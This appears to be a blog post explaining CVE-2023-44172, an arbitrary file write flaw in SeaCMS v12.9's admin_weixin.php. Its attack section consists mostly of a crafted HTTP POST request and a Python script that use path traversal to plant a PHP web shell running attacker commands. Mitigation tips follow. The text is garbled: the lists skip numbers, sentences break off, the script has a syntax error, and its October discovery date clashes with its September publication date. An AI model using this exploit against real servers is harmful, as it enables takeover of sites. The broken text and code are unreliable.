CVE-2023-44172 - SeaCMS v12.9 Arbitrary File Write via admin_weixin.php (Explained! 🚨)

In the fast-moving world of web security, content management systems (CMS) often become targets for hackers. One such case is SeaCMS, a popular video content management system used in various Chinese-speaking regions. In October 2023, a serious arbitrary file write vulnerability—now tracked as CVE-2023-44172—was discovered in SeaCMS v12.9. This flaw could let attackers write malicious files to the server using the component admin_weixin.php. If you run or manage SeaCMS, this vulnerability should be on your radar.

What is SeaCMS?

SeaCMS is an open-source CMS solution mainly used for video streaming websites. It offers a powerful backend and many features, but like any software it isn’t immune to bugs and security gaps.

Product affected: SeaCMS v12.9 (Possibly others)

- Severity: High (Allows attackers to upload or overwrite any file, which could lead to remote code execution)

How Does the Vulnerability Work?

The problem lies in poor input validation inside the admin_weixin.php script. This script doesn't properly check user input, especially when it comes to file paths and contents.

Here's the typical workflow which exposes the bug

1. The attacker sends a specially crafted HTTP POST request to admin_weixin.php with malicious content and target file path.

The attacker visits the uploaded script (for example, a PHP shell) and gains further access.

This is the classic “arbitrary file write” pattern, often leading to full server compromise.

Example Attack Flow

Let’s look at a hypothetical example. Imagine an attacker wants to upload a web shell to take control of the site.

Assuming the attacker has access to the admin panel (or bypasses any simple authentication)

POST /admin/admin_weixin.php?action=saveconfig HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: [LENGTH]

savecfgfile=../../../../webshell.php&savecontent=<?php system($_GET['cmd']); ?>

Here’s a simple Python exploit illustrating the attack

import requests

url = 'http://target-site.com/admin/admin_weixin.php?action=saveconfig';

payload = {
    'savecfgfile': '../../webshell.php',
    'savecontent': '<?php system($_GET["cmd"]); ?>'
}

session = requests.Session()
# Add e.g. session cookies if authentication is needed here:
# session.cookies.set('PHPSESSID', 'your-session-id')
response = session.post(url, data=payload)

if response.status_code == 200:
    print('[+] File uploaded, try accessing: http://target-site.com/webshell.php';)
else:
    print('[-] Exploit failed')

Note: This code is for educational purposes! Never test against servers you don't own.

Update ASAP: If a patch is available, upgrade SeaCMS immediately.

2. Restrict Access: Limit access to /admin/ components, especially admin_weixin.php, using .htaccess or firewall rules.

Strong Authentication: Force strong, unpredictable passwords and remove any default credentials.

4. Input Validation: As a developer, always sanitize and strictly validate user input, especially where file writes are involved!

References & Further Reading

- CVE-2023-44172 @ NVD
- Exploit Database entry (If/when available)
- Original SeaCMS Repository
- Project homepage (Chinese)

Wrapping Up

CVE-2023-44172 is a sharp reminder of why strict input validation and admin access controls are vital in web applications. Admin scripts are particularly juicy targets; any slip like arbitrary file write can cascade into a full-blown compromise.

If you’re using SeaCMS:

And audit your installation for unexpected files.

Stay safe, and always keep an eye out for new CVEs!

Timeline

Published on: 09/27/2023 15:19:38 UTC
Last modified on: 09/27/2023 16:46:00 UTC